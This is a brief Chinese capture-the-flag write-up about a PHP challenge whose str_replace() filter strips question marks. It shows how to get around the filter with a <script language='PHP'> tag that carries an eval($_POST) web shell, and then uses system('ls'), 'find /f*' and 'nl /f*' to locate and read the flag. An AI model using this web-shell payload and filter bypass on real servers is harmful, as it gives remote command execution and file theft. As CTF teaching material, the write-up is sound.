打开题目看代码
str_replace()把字符串中某一的字符,换成另一个字符并且区分大小写。
所以存在一个过滤,把问号过滤掉了。
所以常见的<?php ?>和<? ?>就不可以用了。但是我们还可以用<script></script>
这种php标签可以不用问号。
所以构造语句code=<script language='PHP'>eval($_POST["cmd"]);</script>&cmd=system('ls');
有回显,可以接着就是查询flag
code=<script language='PHP'>eval($_POST["cmd"]);</script>&cmd=system('find /f*');
最后打开即可 code=<script language='PHP'>eval($_POST["cmd"]);</script>&cmd=system('nl /f*');